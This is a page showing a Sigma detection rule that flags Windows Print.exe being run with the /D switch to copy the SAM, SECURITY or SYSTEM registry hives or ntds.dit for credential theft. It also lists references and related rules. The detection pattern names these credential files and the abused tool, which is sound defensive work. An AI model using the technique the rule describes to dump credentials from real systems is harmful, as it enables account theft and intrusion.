Sensitive File Dump Via Print.EXE
Detects the abuse of the Print.exe utility for credential harvesting which involves using Print.Exe to copy sensitive files such as ntds.dit, SAM, SECURITY, or SYSTEM from the Windows directory in order to extract credentials, locally or remotely.
Sigma rule (View on GitHub)
1title: Sensitive File Dump Via Print.EXE
2id: 2fcda7e2-8c57-4904-86ac-37fc3157e09d
3status: test
4description: |
5 Detects the abuse of the Print.exe utility for credential harvesting which involves using Print.Exe to copy sensitive files such as ntds.dit, SAM, SECURITY, or SYSTEM from the Windows directory in order to extract credentials, locally or remotely.
6references:
7 - https://www.microsoft.com/en-us/security/blog/2026/02/06/active-exploitation-solarwinds-web-help-desk/
8 - https://www.huntress.com/blog/credential-theft-expanding-your-reach-pt-2
9 - https://lolbas-project.github.io/lolbas/Binaries/Print/
10author: Ayush Anand (Securityinbits)
11date: 2026-04-28
12tags:
13 - attack.credential-access
14 - attack.stealth
15 - attack.t1003.003
16 - attack.t1003.002
17 - attack.t1218
18logsource:
19 category: process_creation
20 product: windows
21detection:
22 selection_img:
23 - Image|endswith: '\print.exe'
24 - OriginalFileName: 'Print.EXE'
25 selection_cli:
26 CommandLine|contains|windash: '/D'
27 CommandLine|contains:
28 - '\config\SAM'
29 - '\config\SECURITY'
30 - '\config\SYSTEM'
31 - '\windows\ntds\ntds.dit'
32 condition: all of selection_*
33falsepositives:
34 - Unlikely
35level: high
36regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_print_dump_sensitive_files/info.yml
References
Related rules
- Hidden Flag Set On File/Directory Via Chflags - MacOS
- Insensitive Subfolder Search Via Findstr.EXE
- Remote File Download Via Findstr.EXE
- Time Travel Debugging Utility Usage
- Time Travel Debugging Utility Usage - Image